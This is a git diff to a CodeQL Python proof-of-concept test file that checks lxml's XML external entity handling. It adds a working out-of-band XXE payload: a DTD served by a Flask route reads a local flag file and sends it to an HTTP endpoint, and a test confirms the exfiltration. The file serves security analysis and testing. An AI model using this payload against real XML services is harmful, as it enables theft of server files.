diff --git a/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py b/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
index 77d6c032683..b4cb2faf304 100644
--- a/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
+++ b/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
@@ -70,6 +70,10 @@ dtd_retrieval = f"""<?xml version="1.0"?>
 <foo>bar</foo>
 """
 
+exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
+<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
+"""
+
 # ==============================================================================
 # other setup
 
@@ -95,6 +99,22 @@ def test_xxe():
     hit_xxe = True
     return "ok"
 
+@app.route("/exfiltrate-through.dtd")
+def exfiltrate_through_dtd():
+    return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
+<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
+%eval;
+%exfiltrate;
+    """
+
+exfiltrated_data = None
+@app.route("/exfiltrate-data")
+def exfiltrate_data():
+    from flask import request
+    global exfiltrated_data
+    exfiltrated_data = request.args["data"]
+    return "ok"
+
 def run_app():
     app.run(host=HOST, port=PORT)
 
@@ -346,7 +366,7 @@ class TestLxml:
         parser = lxml.etree.XMLParser()
         root = lxml.etree.fromstring(local_xxe, parser=parser)
         assert root.tag == "test"
-        assert root.text == "SECRET_FLAG\n", root.text
+        assert root.text == "SECRET_FLAG", root.text
 
     @staticmethod
     def test_local_xxe_disabled():
@@ -412,6 +432,16 @@ class TestLxml:
             pass
         assert hit_dtd == False
 
+    @staticmethod
+    def test_exfiltrate_through_dtd():
+        # note that this only works when the data to exfiltrate does not contain a newline :|
+        global exfiltrated_data
+        exfiltrated_data = None
+        parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
+        with pytest.raises(lxml.etree.XMLSyntaxError):
+            lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
+
+        assert exfiltrated_data == "SECRET_FLAG"
 
 # ==============================================================================
 
diff --git a/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag b/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
index 45c9436ee9f..b8bd6838774 100644
--- a/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
+++ b/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
@@ -1 +1 @@
-SECRET_FLAG
+SECRET_FLAG
\ No newline at end of file